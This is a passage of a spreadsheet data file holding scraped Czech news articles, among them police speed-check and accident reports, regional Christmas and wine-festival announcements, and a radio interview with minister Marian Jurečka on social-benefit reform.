z jiného úhlu? Místo nekonečného stěžování si na ponurou realitu se snažme nosit v srdci barvy, které nám život nabízí. Městské džungle a zábava za rohem Pokud si myslíte, že město je jedno velké asfaltové hřiště pro stres a neustálé shánění parkovacího místa, možná se pletete. Město je totiž i jedna velká aréna pro dobrodružství, zábavu a setkání, která se vám otevře, pokud jen na chvíli zakryjete zraky před monotonií. Místo abyste přehlíželi stánky s jídlem na každém rohu, zkuste vyzkoušet nějaký ten street food. Uvidíte, že buráky v omáčce vás dokážou rozesmát víc než průměrný vtip o blondýnách. A jestliže všechnu tu drtící rutinu vnímáte jako by vám opravdu spadl kámen na nohu, nezapomínejte na sílu humoru. Abychom se nezapomněli smát, věřte, že klíčem k přežití v bouřlivých vodách života je případná schopnost posmívat se sám sobě. Občas je dobré pozvat přátele a hrát si na módní návrháře, kdy si vyberete ty nejšílenější kombinace oblečení, a vyrazíte na procházku. Pamatujte, co se nestane na ulici, to zůstane u vás doma – ale na Instagramu najít nesmrtelnost můžete docela snadno. A tak si žijte svůj život jako umění, hrajte si s barvami, kombinujte styl s chaossem, a nezapomeňte, že ten jedinečný moment, kdy si objednáváte černý kávu s kouskem dortu, může být tím nejvýraznějším aktem rebelie ve světě, kde większości proklíná soboru. Tak si dopřejte ten luxus hrát si na královny a krále vlastního osudu a berte život s nadhledem, i když vám některá faktura právě dorazila na stůl. Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241101_217_3264456143_dcc7f129b7e4b01fff42.html</t>
  </si>
  <si>
    <t>dcc7f129b7e4b01fff42</t>
  </si>
  <si>
    <t>Dopravní policisté kontrolovali nehodový úsek silnice I/38 při speciální dopravně bezpečnostní akci</t>
  </si>
  <si>
    <t>Dopravní policisté kontrolovali nehodový úsek silnice I/38 při speciální dopravně bezpečnostní akci KRAJ/ČESKOLIPSKO - Na devadesátce radary naměřily i stočtyřicetdevět kilometrů v hodině. Policisté z českolipského dopravního inspektorátu společně s kolegy z oddělení silničního dohledu libereckého krajského ředitelství včera společně kontrolovali lesní úsek silnice I/38 na Českolipsku mezi obcemi Obora a Bezděz Dvůr, který si nevybrali náhodně. V minulosti zde došlo k několika velmi vážným nehodám s tragickými následky. Poslední se tu stala koncem července, kdy se u Obory střetl ve vysoké rychlosti osobní vůz tovární značky Volkswagen Passat s dodávkou, ve které cestovala pětičlenná rodina. Na místě zemřel řidič dodávky a těžké zranění utrpěli jeho tři synové a manželka. Řidič volkswagenu podlehl svým těžkým zraněním později v nemocnici. Podle svědků právě on projížděl po silnici I/38 z Mladé Boleslavi na Českolipsko velmi riskantně, když u Obory vyjel do protisměru a smetl dodávku ze silnice. Včerejší výsledky měření rychlosti v tomto úseku jen potvrdily, že si tu řidiči s překračováním rychlostních limitů starosti příliš nedělají. Radary zaznamenaly během čtyř hodin překročení dovolené rychlosti u 21 z nich, přičemž se zjištěné hodnoty většinou pohybovaly na devadesátce od 120 kilometrů výše. Dva řidiči jeli dokonce rychlostí 147 a 149 kilometrů za hodinu. Posledním dvěma jmenovaným zadrželi policisté řidičský průkaz a jejich přestupek oznámili do správního řízení. V něm skončí i řidič, kterému naměřili 128 kilometrů v hodině a byl navíc pod vlivem alkoholu . I on se včera "rozloučil" se svým řidičským průkazem. Mezi další prohřešky patřilo nebezpečné předjíždění v místech, kde ho zakazuje dopravní značka nebo přes plnou čáru před horizontem. To kolegové ocenili pětitisícovou pokutou. Někteří řidiči se také "zapomněli" připoutat bezpečnostním pásem. Silnici využívají ve větší míře obyvatelé Českolipska, kteří dojíždějí do zaměstnaní na směny do Středočeského kraje , proto je velmi frekventovaná a vysoká rychlost, ani další rizikové chování na ni rozhodně nepatří. Dopravní policisté budou tomuto úseku i nadále věnovat zvýšenou pozornost. 1. 11. 2024 por. Bc. Ivana Baláková tisková mluvčí KŘP Libereckého kraje</t>
  </si>
  <si>
    <t>24700</t>
  </si>
  <si>
    <t>27920</t>
  </si>
  <si>
    <t>20241101_218_3264615221_ddc48078bf0998206254.html</t>
  </si>
  <si>
    <t>ddc48078bf0998206254</t>
  </si>
  <si>
    <t>Dopravní policisté kontrolovali nehodový úsek silnice I/38 při speciální dopravně bezpečnostní akci KRAJ /ČESKOLIPSKO - Na devadesátce radary naměřily i stočtyřicetdevět kilometrů v hodině. Policisté z českolipského dopravního inspektorátu společně s kolegy z odboru silničního dohledu libereckého krajského ředitelství včera společně kontrolovali lesní úsek silnice I/38 na Českolipsku mezi obcemi Obora a Bezděz Dvůr, který si nevybrali náhodně. V minulosti zde došlo k několika velmi vážným nehodám s tragickými následky. Poslední se tu stala koncem července, kdy se u Obory střetl ve vysoké rychlosti osobní vůz tovární značky Volkswagen Passat s dodávkou, ve které cestovala pětičlenná rodina. Na místě zemřel řidič dodávky a těžké zranění utrpěli jeho tři synové a manželka. Řidič volkswagenu podlehl svým těžkým zraněním později v nemocnici . Podle svědků právě on projížděl po silnici I/38 z Mladé Boleslavi na Českolipsko velmi riskantně, když u Obory vyjel do protisměru a smetl dodávku ze silnice . Včerejší výsledky měření rychlosti v tomto úseku jen potvrdily, že si tu řidiči s překračováním rychlostních limitů starosti příliš nedělají. Radary zaznamenaly během čtyř hodin překročení dovolené rychlosti u 21 z nich, přičemž se zjištěné hodnoty většinou pohybovaly na devadesátce od 120 kilometrů za hodinu výše. Dva řidiči jeli dokonce rychlostí 147 a 149 kilometrů za hodinu. Posledním dvěma jmenovaným zadrželi policisté řidičský průkaz a jejich přestupek oznámili do správního řízení. V něm skončí i řidič, kterému naměřili 128 kilometrů v hodině a byl navíc pod vlivem alkoholu . I on se včera "rozloučil" se svým řidičským průkazem. Mezi další prohřešky patřilo nebezpečné předjíždění v místech, kde ho zakazuje dopravní značka nebo přes plnou čáru před horizontem. To kolegové ocenili pětitisícovou pokutou. Někteří řidiči se také "zapomněli" připoutat bezpečnostním pásem. Silnici využívají ve větší míře obyvatelé Českolipska, kteří dojíždějí do zaměstnaní na směny do Středočeského kraje , proto je velmi frekventovaná a vysoká rychlost, ani další rizikové chování na ni rozhodně nepatří. Dopravní policisté budou tomuto úseku i nadále věnovat zvýšenou pozornost. 1. 11. 2024 por. Bc. Ivana Baláková tisková mluvčí KŘP Libereckého kraje Autor: Kurzy.cz || Policie.cz | (Policie)</t>
  </si>
  <si>
    <t>20241101_219_3243759190_66a0d9f7e21bb9334448.html</t>
  </si>
  <si>
    <t>66a0d9f7e21bb9334448</t>
  </si>
  <si>
    <t>Řidič v Přerově přehlédl mladého motorkáře a srazil ho</t>
  </si>
  <si>
    <t>Řidič v Přerově přehlédl mladého motorkáře a srazil ho 1. 11. 2024 Eva Zajíčková Olomoucký kraj, Zprávy Fotky Policie ČR PŘEROV – Nehoda se stala včera odpoledne. Řidič Fordu jedoucí po vedlejší silnici na svou obranu tvrdil, že motorku měl schovanou za dodávkou, které dal přednost, a proto ji přehlédl a motorkáře srazil. Nehoda se stala 31. října před druhou hodinou odpolední v Přerově na křižovatce ulic Klivarova x Dvořákova x Vsadsko . Řidič Fordu jel po vedlejší Klivarově ulici a chystal se projet křižovatku rovně na ulici Vsadsko . „Dle jeho výpovědi se na křižovatce rozhlédl a viděl pouze dodávkové vozidlo, které již bylo za úrovni křižovatky a proto se rozhodl, že bude pokračovat v přímém směru jízdy po jeho projetí. V okamžiku, kdy vjel do křižovatky, spatřil po pravé straně motocykl, který řídil mladistvý motorkář jedoucí ve směru od ulice Dvořákova směrem ke kruhovému objezd,“ popsala situaci policejní mluvčí Miluše Zajícová. Na tuto situaci už nestihl zareagovat a mladého motorkáře srazil. Na svou obranu řidič Fordu policistům řekl, že měl motorku schovanou za dodávkou a proto ji přehlédl. Staňte se členy FB skupiny Život v Olomouckém kraji a žádná zpráva vám neunikne. Sledujte nás na síti X, kde pro vás připravujeme plejádu pestrých zpráv. Po srážce motorkář přepadl přes řídítka a zůstal ležet na silnici. Záchranáři ho na místě ošetřili a převezli ho na další vyšetření do nemocnice. Řidič Fordu měl dechovou zkoušku na alkohol negativní. Místo nehody OLOMOUCKÝ KRAJ – Oteplení a slunečné počasí již mnoho motorkářů láká vytáhnout své stroje z garáží a vyrazit na cesty. Policisté proto častěji řeší nehody […] Olomoucký kraj PŘEROVSKO – Hasiči si musí poradit v každé situaci. Včera ráno museli zdolat požár trafostanice na Přerovsku , kvůli nebezpečí úrazu elektřinou tedy nepřicházelo v úvahu […] Olomoucký kraj Autor: Eva Zajíčková Autor person Eva Zajíčková Rubrika transition_slide Olomoucký kraj</t>
  </si>
  <si>
    <t>20241101_22_3264689608_0bde805cc03d3dd22d1e.html</t>
  </si>
  <si>
    <t>0bde805cc03d3dd22d1e</t>
  </si>
  <si>
    <t>Vánoční cesta kolem světa na zámku Loučeň</t>
  </si>
  <si>
    <t>Vánoční cesta kolem světa na zámku Loučeň ceskeobzory.cz – redakce 1 listopadu, 2024 30 října, 2024 Snili jste někdy o cestě kolem světa? Snili jste o zámku, kde každou komnatu zdobí vánoční stromeček jinak ozdobený a možná pod ním najdete dárek? Anebo tady na vás bude čekat překvapení v podobě zajímavé informace jakým způsobem se různě po světě slaví Vánoce? Snili jste vůbec? A nesníte málo? Dopřejte si dobu adventu, dobu snění, zázraků a těšení se na Ježíška, na zámku Loučeň . Jako již tradičně budou zdobit všechny komnaty zámku nejrůznější vánoční stromečky. Tentokrát s tématem Cesta kolem světa. Zavítejte spolu s kostýmovanými průvodci do nejrůznějších koutů země a seznamte se při vánoční prohlídce s tradicemi zemí blízkých i vzdálených. Dovolte si snít. Dovolte si zastavit. Zastavte se na středočeském zámku Loučeň v době od 23. listopadu tohoto roku do 23. ledna roku 2025 a nahlédněte do tajů vánočních zvyků po světě. Pokud by to někomu připadalo málo, stavte se tady v sobotu 30. listopadu 2024, kdy navíc proběhne Křest největšího adventního věnce v České republice . „Advent na zámku Loučeň zahájíme 30.11. od 16. hodin krásným rituálem, při kterém andělé rozsvěcí svíce na věnci a žehnají klid a lásku pro celé předvánoční období. Její Milost Bílá Paní loučeňská, Paní Terezie Berková z Dubé na Loučeni zahájí spolu s anděly ten pravý vánoční čas,“ uvádí Kateřina Šrámková, CEO zámku Loučeň . „I v tento den bude zámecký areál otevřen již od 10:00 hodin, můžete tak zažít prohlídku „Příběh vánočního stromečku“, zadovádět si v parku mezi labyrinty a bludišti nebo si v dílničce dozdobit vlastní vánoční ozdobu. V areálu jsou otevřeny dvě restaurace. Lze si ale opéct i buřty na venkovním ohništi. V 17:00 zakončíme den světelně hudební show. Prohlídku doporučujeme zakoupit předem na: https://tickets.zamekloucen.cz/vstupenky. Vstupné pouze na venkovní program a do parku s labyrinty je 150 Kč. V ceně vstupenky na „Příběh vánočního stromečku“ je i venkovní program,“ dodává Kateřina Šrámková. Příběh vánočního stromečku Sedmý ročník Příběhu vánočního stromečku, letos s podtitulem Cesta kolem světa, začíná již 23. listopadu. Vánoční atmosféra, nazdobené stromečky, ozdoby všech tvarů a barev i průvodci v kostýmech na vás budou čekat každý den v týdnu, včetně sobot a nedělí, až do 23. ledna 2025. Celkem 20 stromečků nazdobených stovkami ozdob potěší oči dětí i dospělých. Můžete se těšit mimo jiné na Cestovatelský, Louskáčkový, Africký, Viktoriánský nebo Befanový stromeček. Že nevíte, kdo je Befana, tak na Zámku Loučeň se to letos dozvíte. Všechny stromečky jsou úplně nové, s novým tématem a ozdobami. Všechny ozdoby jsou české a ty skleněné foukané pochází ze sesterské firmy Koulier z Oflendy . Kromě prohlídek na vás čeká dílna, kde si můžete nazdobit vlastní ozdobu nebo si nějakou zakoupit domů. Největší adventní věnec i světelná show Od první adventní soboty lze na nádvoří zámku obdivovat největší adventní věnec v Česku. Současně bude na zámek promítána světelně-hudební show každý den od 17:00. Kdy je ten nejlepší čas na návštěvu? Dopolední prohlídky Příběhu vánočního stromečku jsou určeny zejména školním skupinám. Seznámit se s příběhem Vánoc mohou přijet žáci mateřských a základních škol až do vánočních prázdnin. Zámek Loučeň je pro veřejnost otevřen každý den (i v pondělí), včetně Štědrého dne, vánočních svátků i Nového roku. Doporučovány jsou velmi oblíbené večerní prohlídky zámku, které probíhají každou sobotu až do 30.12.2024. Podobné příspěvky 17 března, 2024 16 března, 2024 Prodejní výstava tropických rostlin doplní aktuální expoziciNOVÁ PET TROPICANA Botanická zahrada hl. m. Prahy připravuje výstavu Tropické květy. Ta od 22. března doplní uměleckou expozici sochařky Veroniky Richterové NOVÁ PET TROPICANA. Skleník Fata Morgana rozzáří velké množství tropických květů a rostlin, včetně orchidejí, v působivých aranžmá, která botanická zahrada připraví ve spolupráci se studenty zahradnických oborů… 9 září, 2024 17 září, 2024 Znojemské vinobraní, které proběhne od 13. do 15. září, slibuje zážitek plný historie, kultury a kvalitního vína . Tato tradiční akce letos slaví své 40. výročí a každoročně přiláká kolem 80 tisíc návštěvníků, čímž se řadí mezi největší vinařské slavnosti v České republice . Historické centrum Znojma se na tři dny promění v „královské město“ plné středověkých… 22 října, 2024 21 října, 2024 Ve čtvrtek 17. října v podvečer nakladla do kladiště v expozici čtyřiadvacetiletá samice želvy obrovské 31 vajec. Jde o její celkem třetí snůšku, která se od prvních dvou odlišuje. Byla totiž nakladena naráz a samicí pečlivě zahrabána. Vejce teraristé v pátek ráno odebrali a vložili pro lepší kontrolu do inkubátoru. Pokud půjde vše tak, jak má, mláďata by se měla… 21 června, 2024 25 června, 2024 O víkendu 22. a 23. června ožije centrum Kutné Hory tradiční historickou slavností s tradičním programem, navázaným na návštěvu krále Václava IV. a jeho dvora ve městě stříbra. Návštěvníci se mohou těšit, jak již je zvykem, na rytířské turnaje na zemi i na koních, na dvorskou slavnost, ohňostroj, řemesla, tance i stříbrnou nedělní mši. Pro letošní jubilejní… ceskeobzory.cz – redakce 6 března, 2024 Kvetou jarní cibuloviny, kaliny i první rododendrony a magnolie Již 1. března začalo meteorologické jaro a v Botanické zahradě hl. m. Prahy je to znát na každém kroku. V expozicích jsou vidět první jarní květy sněženek, krokusů, ladoněk, ale i narcisů, nízkých kosatců a rozkvetl už také drobný skalničkový tulipán Kaufmannův. Pozadu nezůstávají ani keře a stromy,… ceskeobzory.cz – redakce 28 srpna, 2024 16. ročník soutěže o značku Dobrý tuzemský potravinářský výrobek „ČESKÁ CHUŤOVKA 2024″ a 14. ročník soutěže o značku „DĚTSKÁ CHUŤOVKA 2024“ DOKÁŽÍ ČEŠTÍ POTRAVINÁŘI VYUŽÍT VRACEJÍCÍ SE NÁKUPNÍ OPTIMISMUS? Podle Svazu obchodu a cestovního ruchu ČR a výzkumné agentury NIQ se do českých obchodů již vrací opatrný optimismus, zákazníci začínají více utrácet a rádi si … Autor: ceskeobzory.cz – redakce Rubrika transition_slide Nadcházející akce</t>
  </si>
  <si>
    <t>42</t>
  </si>
  <si>
    <t>20241101_220_3243735881_29d405a6c76216d0d3b2.html</t>
  </si>
  <si>
    <t>29d405a6c76216d0d3b2</t>
  </si>
  <si>
    <t>Motory řvou, pneumatiky kouří. V Lysé se koná 28. ročník výstavy Autosalon</t>
  </si>
  <si>
    <t>Motory řvou, pneumatiky kouří. V Lysé se koná 28. ročník výstavy Autosalon Autosalon a Motor Show 2024 v Lysé nad Labem letos přinášejí bohatý program pro fanoušky automobilů a motocyklů. Návštěvníci mohou vidět nejnovější modely různých značek i speciální závodní a tuningové vozy, které se pravidelně účastní tuzemských i zahraničních soutěží. Výstava je rozdělená do dvou hal a venkovních prostor a představí pestrou škálu vozidel od moderních novinek až po klasické veterány. Návštěvníci se mohou těšit na sekci US Cars Show s ikonickými americkými vozy a na novou truck zónu s upravenými kamiony. Novinkou letošního ročníku je také expozice motocyklových tříkolek Trike. Tuning Show představí různě upravené automobily. K vidění bude i Classic Cars zóna, která potěší příznivce nostalgie ukázkou starších osobních i nákladních vozů. play_fill Nymbursko V doprovodném programu se návštěvníci mohou těšit na Drift Show, kde budou mít odvážlivci možnost svézt se v Drift Taxi a zažít, jaké to je jet dveřmi napřed, nebo si vyzkoušet jízdu na motorové driftovací tříkolce. Speciální sobotní Tuning Sraz nabídne hlasování o nejhezčí tuningový vůz, zatímco hudební nadšence potěší vystoupení kapely Argema. Souběžně probíhající Pivní a vinné slavnosti navíc nabídnou ochutnávku českých piv a vín. V rámci slavností budou nabízeny také vynikající pochutiny včetně tradiční svatomartinské husy. V Lysé se koná 28. ročník výstavy Autosalon. | Video: Michal Bílek Autor: Michal Bílek, Veronika Hýblerová Autoři person Michal Bílek person Veronika Hýblerová</t>
  </si>
  <si>
    <t>20241101_221_3243663366_68d756223a93a6d373ff.html</t>
  </si>
  <si>
    <t>68d756223a93a6d373ff</t>
  </si>
  <si>
    <t>Žehnání Svatomartinského vína v Uherském Hradišti</t>
  </si>
  <si>
    <t>Žehnání Svatomartinského vína v Uherském Hradišti 01. 11. 2024 - UH. HRADIŠTĚ - Srdečně vás zveme na tradiční Žehnání Svatomartinského vína , které se uskuteční v pondělí 11. listopadu 2024 na Masarykově náměstí v Uherském Hradišti . Tato akce je významnou událostí v kalendáři města a nabízí jedinečnou příležitost oslavit svátek svatého Martina v duchu tradic a místní kultury. Program: Svatý Martin přijede na bílém koni na Masarykovo náměstí v Uherském Hradišti přesně v 11:11 hodin za zvuku kostelních zvonů, aby předal knězi letošní víno k požehnání. Tento symbolický akt dodá celé události duchovní rozměr a připomene legendu o svatém Martinovi a jeho plášti, která vždy přiláká stovky přihlížejících. „Žehnání svatomartinských vín je pro nás nejen oslavou vína samotného, ale také příležitostí ukázat bohatství naší kultury a tradic. Velmi si vážím poctivé práce místních vinařů a jsem si jistý, že i letos nám mají co nabídnout. Proto se těším, že se 11. listopadu setkáme v srdci Slovácka na Masarykově náměstí, kde společně ochutnáme první vína nového ročníku,“ říká Stanislav Blaha , starosta města Uherské Hradiště a předseda správní rady Regionu Slovácko . Po slavnostním zahájení se můžete těšit na vinný trh, kde bude možné ochutnat více než 50 vzorků Svatomartinských a mladých vín od lokálních vinařů. Tato vína vám nabídnou první ochutnávku letošní úrody a nastíní, co můžeme očekávat od nadcházející vinařské sezóny. Mezi vzorky budou tradičně zastoupeny odrůdy Müller Thurgau, Muškát moravský a Veltlínské červené ranné mezi bílými víny, a Svatovavřinecké, Modrý Portugal a Zweigeltrebe v rosé i červené variantě. Mezi mladými víny se objeví méně známé odrůdy, jako Solaris či Saphira, a zajímavé bude jistě i mladé Chardonnay, Sauvignon či Irsai. „Letošní vinařská sezóna byla velmi ovlivněna jarními mrazy, kdy pomrzla velká část vinic. Nebyla ušetřena ani Slovácká podoblast. Díky horkému, ale suchému létu se vinice částečně zregenerovaly a tak letošní úroda je na 60-70 % běžného roku. Co se týče kvality hroznů, tak ty díky letním vysokým teplotám dozrály do cukernatosti – pozdní sběr. Mladá vína ročníku 2024 se jeví zatím velmi svěží a ovocná, ale na výsledek si budeme muset počkat do jara 2025“ říká Mgr. Ivo Kaňovský ze Zámeckého vinařství Bzenec , který byl součástí akce od samého začátku. Celým dnem nás bude provázet bohatý folklorní program a cimbálová muzika, která dodá akci tu pravou atmosféru. O občerstvení se postarají místní podnikatelé, kteří nabídnou svatomartinské speciality. Můžete se těšit na husí a kachní maso v různých úpravách, krajíce chleba s husí paštikou a samozřejmě tradiční svatomartinské rohlíčky. K tomu všemu nebude chybět kvalitní horká káva a pro ty, kteří by chtěli něco na srovnání kyselinky, bude k dispozici martinský pivní speciál z Jarošovského pivovaru. Tato tradice má v Uherském Hradišti hluboké kořeny a je oslavou nejen vína , ale i místní kultury a historie. Svatomartinská vína jsou prvními víny nového ročníku a jejich požehnání symbolizuje naději a očekávání dobré úrody. Tento den je příležitostí setkat se s přáteli, rodinou a sousedy, sdílet radost a užít si společně strávený čas v jedinečné atmosféře tohoto královského města – Uherského Hradiště . Přijďte v pondělí 11. 11. 2024 na Žehnání Svatomartinského vína na Masarykovo náměstí v Uherském Hradišti a vychutnejte si letošní Svatomartinská vína ! Pokud vás zajímá gastronomie, máte rádi dobré jídlo a pití, navštěvujete kvalitní restaurace, kavárny a bary, pak čtěte také tištěný gastro magazín Štamgast a Gurmán . Autor: Štěpán Prachař Autor person Štěpán Prachař</t>
  </si>
  <si>
    <t>99</t>
  </si>
  <si>
    <t>38</t>
  </si>
  <si>
    <t>20241101_222_3243663244_706478ab8876162cc34f.html</t>
  </si>
  <si>
    <t>706478ab8876162cc34f</t>
  </si>
  <si>
    <t>Jurečka: Úspora není cílem reformy&amp;nbsp;sociálních dávek</t>
  </si>
  <si>
    <t>Jurečka : Úspora není cílem reformy&amp;nbsp;sociálních dávek Jurečka : Úspora není cílem reformy sociálních dávek Marian Jurečka Radiožurnál Co si vláda slibuje od návrhu změn sociálních dávek, který začala projednávat Poslanecká sněmovna? Jaké dopady budou mít změny na domácnosti, obchod s chudobou a státní rozpočet? Je spravedlivý tzv. majetkový test, který stanovuje, co smí vlastnit žadatelé o sociální dávky? hostem Dvaceti minut Radiožurnálu , které vysílá také Český rozhlas Plus, je ministr práce a sociálních věcí, místopředseda vlády a donedávna předseda KDU-ČSL Marian Jurečka . Dobrý den. Vítejte v našem sněmovním studiu. Sněmovna začala projednávat návrh vašeho ministerstva na změny sociálních dávek, čtyři současné dávky, konkrétně příspěvek a doplatek na bydlení, příspěvek na živobytí a přídavek na dítě má nahradit jedna nová dávka. Té se v těch debatách říká super dávka v zákoně je označovaná jako dávka státní sociální pomoci. Součástí těch změn má být také majetkový test žadatelů, pokud budou mít moc peněz, aut nebo nemovitostí, tak ztratí nárok na tu novou dávku. Co je z vašeho pohledu tím hlavním cílem těchto změn? Marian Jurečka , vicepremiér, ministr práce a sociálních věcí /KDU-ČSL/ ——————– Tím hlavním cílem je, aby to bylo pro ty žadatele daleko jednodušší a přehlednější a také zároveň dostupnější. Dneska máte čtyři dávky, čtyři správní řízení, tři různé typy posuzovaných příjmů té dané domácnosti. Často ti lidé třeba mají nárok na některou další a vlastně si tu žádost jenom nepodali a pak jsou třeba oni a jejich děti ve složité situaci. Takže aby tady vlastně byla jedna dávka. Jedno řízení jednoduše dostupné přes digitál, samozřejmě počítáme i s tou offline formou pro lidi, kteří nemají digitální možnosti. A zároveň vlastně je cílem, abychom dokázali lidi daleko víc motivovat. Odstraňovali body zlomu a motivovali je tak, aby ti, kteří mohou pracovat, pracovali, abychom podporovali přirozené funkce v rodině, že třeba je normální, že jako rodič se starám o to, aby dítě chodilo do školy. Tak to jsou třeba ty základní věci, proč to děláme. moderátor ——————– Je mezi těmi základními cíli i to, aby státní rozpočet ušetřil, aby neplatil dávky těm, kteří je nepotřebují? Marian Jurečka , Ne, to právě vůbec tím cílem není. To jsem dneska zmiňoval, když jsme to projednávali v Poslanecké sněmovně v prvním čtení, že úspora fakt není cílem této velké reformy, kterou děláme po 30-ti letech. My dokonce přiznáváme celkem otevřeně, protože tam je obrovská jako kvalitní datová analytika pod tímto návrhem, že to může znamenat, že stát ušetří zhruba dvě miliardy korun, anebo že zhruba o osm miliard korun více vydáme. Abych vysvětlil posluchačům, proč je tam možná i ta varianta, že vydáme víc, to by bylo v případě, že ti lidé změní své chování, že tam budeme vyplácet víc za ten pracovní bonus, to znamená, že ti lidé, kteří nám dneska nepracují, pracovat začnou, a to na druhou stranu říkám, to je přece ale i chtěný jako výsledek, pak ti lidé samozřejmě budou mít také odvody na daních sociálním, zdravotním, takže já si myslím, že ve finále se nám podaří mít ten pozitivní efekt, to znamená, že to stát bude stát o něco málo více, ale zároveň z hlediska. moderátor ——————– Pardon. To je pozitivní, že bude stát platit víc? Marian Jurečka To je pozitivní v tom slova smyslu, že pomůžeme víc, kteří tu pomoc fakt potřebují a dneska ji nemají adekvátní, zamezíme tu pomoc tam, kde ta pomoc není nutná. Kde ten člověk může sám pracovat, ale dneska nepracuje, protože ten systém mu k tomu vlastně nenutí a nemotivuje a že rozpohybujeme ty lidi, kteří třeba jako dlouhodobě jsou jako lidé už mimo systém, že je prostě vlastně jako nemáme ani v uchazečích o zaměstnání a že s nimi nedokážeme lépe pracovat. moderátor ——————– Vy jste říkal, že k tomu návrhu máte hodně datových analýz, dá se říci, nebo můžete říci, kolik domácností by po těch změnách mělo nárok na vyšší příspěvky, pro kolik domácností by to naopak mělo znamenat, že bude dostávat méně? Marian Jurečka , Tak v tento okamžik, když to řeknu hodně teďka zjednodušeně, ale abych vám odpověděl, zhruba u jedné třetiny domácností víme, že určitě dostanou více, protože tam tu podporu díky těm odstraněným bodům zlomu, díky jejich pracovní aktivitě, tak ji doručíme větší. Nebo třeba díky tomu, že tam jsou zranitelní členové domácnosti. U třetiny domácností předpokládáme nebo žadatelů, že to bude stejné a u jedné třetiny, že dojde k poklesu a tady je ten dotazník. Pokud nezmění to své dosavadní chování. Pokud ho změní, tak pak je ta varianta, kterou se říká před chvílí, pak v tom systému vydáme i o něco více. Ale to je vlastně to, co společensky chceme, že chceme, aby ti lidi prostě jako byli aktivizováni, aby dělali, když mohou pracovat a aby třeba se řádně starali o výchovu svých dětí. moderátor ——————– Typicky kterým domácnostem by to mělo pomoci? Marian Jurečka , vicepremiér, ministr práce a sociálních věcí /KDU-ČSL/ ——————– Typicky domácnostem, které mají, řekněme, nízké nebo úplně ty nejnižší příjmy, mají děti a zároveň se snaží pracovat, chodí do práce.A tady by jim v zásadě ten jejich příjem nebo ta podpora státu vlastně měla přinést více, protože v té dávce vlastně je jako jedna důležitá nová věc, a to je ten tzv. pracovní bonus. My vlastně jako fakt chceme. Proto jsme tam odstranili ty body zlomu, aby se nestávalo to, co se děje dnes, že dneska třeba jenom kvůli koruně příjmů navíc té domácnosti ztratíte nárok třeba na celou dávkou podporu. Takže vlastně my chceme, aby tady opravdu ten člověk byl motivovaný, že má smysl pro něj chodit do práce a nebýt doma. Mimo jiné i proto, že to je jedna z věcí, jsem mluvil o těch přirozených funkcích rodiny, tak mi záleží na tom, že přece je normální, aby dítě vidělo svého tátu a mámu pracovat, pokud může. Takže proto vlastně v této oblasti ten pracovní bonus se bude chovat tak, že těm lidem opravdu dáme víc peněz, ale je to chtěné. Tady chceme podporovat to, aby ten člověk opravdu změnil to své chování dosavadní. moderátor ——————– Máte nějaký odhad, kolik současných příjemců těch čtyř dávek neprojde majetkovým testem? Marian Jurečka , Ten odhad dnes přesně do detailů nemáme, protože upřímně vlastně do dnešních dnů se mimo hmotnou nouzi takovýto test vůbec nedělá. Takže my tady teď zavádíme, já bych řekl, základní parametr toho testu, to je vlastně ta hotovost nebo ten zůstatek na účtu, pak je to nemovitost k bydlení a pak je to vlastně osobní auto s tím, že vlastně pamatujeme na to, že bereme automaticky, že jednu nemovitost k bydlení je v pořádku mít, druhá, pokud třeba v rámci dědického řízení se stane, tak to říkáme, tam je to na časově omezenou dobu, to vlastnictví. V případě částek na účtě je to do 400 000 Kč. V případě čtyř a vícečetné rodiny jinak je to 200+50+50. S tím ale, abych posluchačům vysvětlil, toto se nebude vztahovat třeba na produkty, jako je stavební spoření nebo penzijní spoření ve třetím pilíři, tam, kde je podpora ze strany státu. A nebude se to ani vztahovat na to, když ten člověk to má třeba v nějakých svých konkrétních investičních produktech. Opravdu díváme se na to, jestli mu leží peníze na účtu, nebo neleží a pak je to to motorové vozidlo na dospělou osobu. A beru to tak, že vlastně jako já mám garantovat daňovému poplatníkovi, že pomáháme a posíláme peníze tam, kde opravdu potřeba jsou, ale ten člověk třeba nemá nejenom jiné příjmy, ale i jiný majetek, jak by se mohl zabezpečit. moderátor ——————– Ministr práce a sociálních věcí, místopředseda vlády, člen KDU-ČSL Marian Jurečka je dnešním hostem Dvaceti minut Radiožurnálu. K tomu návrhu změn sociálních dávek mají řadu připomínek neziskové organizace. Formulovala je před týdnem Iniciativa za rovnost, spravedlnost a lidská práva, která zastřešuje 33 společností, nadací nebo spolků. Zástupci Charity a Člověka v tísni o nich mluvili i v našich včerejších pořadech ve Dvaceti minutách Radiožurnálu , také v Pro a proti ve vysílání Českého rozhlasu Plus. Tou základní připomínkou je, že vámi navrhovaná změna místo motivování lidí k řešení obtížné situace zpřísňuje pravidla pro poskytování podpory. Že místo pozitivní motivace pracujete s negativní motivací, že v řadě případů berete nebo ta novela nebo ten nový zákon by bral nárok na sociální dávky. Vnímáte tuhle tu kritiku? Marian Jurečka , Já to vlastně vidím v principu úplně naopak, já toho rodiče motivuju, toho člověka motivuju k té práci, když pracovat může a k tomu, že jako rodič zabezpečuje jednu ze základních povinností rodiče, starat se o vzdělání svých dětí a za to, když tohle, tyto věci, které by řekl, jsou takové jako základem toho fungování. Když to ten rodič dělá, tak za to já ho odměňuju, dává mu tam ten jako určitý bonus, který on získá v rámci té dávky. Ale prostě já se nehodlám smířit s tím, že po 30 letech vedem polemiku, co je to trestání. Podle mě největší trestání je to, když rodič svému dítěti odepře možnost získat adekvátní vzdělání, tím ho ten rodič potrestá prakticky na celý život. A jasně říkám za to zodpovědné chování toho rodiče ho v tomto systému bonifikuju a oceňuju. moderátor ——————– Když ale mluvíte třeba o tom, jestli rodiče posílají děti do školy, neziskové organizace to kritizují, ten váš návrh, že rodina, která neposílá dítě do školy, přijde o sociální dávky na děti. Není tenhle ten model vlastně proti zájmu toho dítěte? Marian Jurečka , Ne, není. Já tvrdím, že jednoznačně já ho naopak to rodiče motivuju a nesouhlasím ani s tou argumentací některých organizací, které říkají, my vlastně bereme ty peníze tomu dítěti. Ani dnes v tom systému ty peníze nejsou takzvaně omašličkované. Ten rodič je dostane, třeba ten přídavek na dítě a upřímně, jestli si jde za to koupit alkohol nebo cigarety, to my dneska nedohlédneme. Ty peníze dneska vůbec nemusí jít za tím dítětem, za jeho potřebami. Za jeho kroužky a podobně. My samozřejmě do budoucna pracujeme na tom, abychom třeba byli schopni díky digitalizaci ty peníze přímo poukázat třeba na úhradu Lidušky nebo Zušky, jak se říká, nebo i jiných věcí, které souvisí třeba s volnočasovými aktivitami. Tam 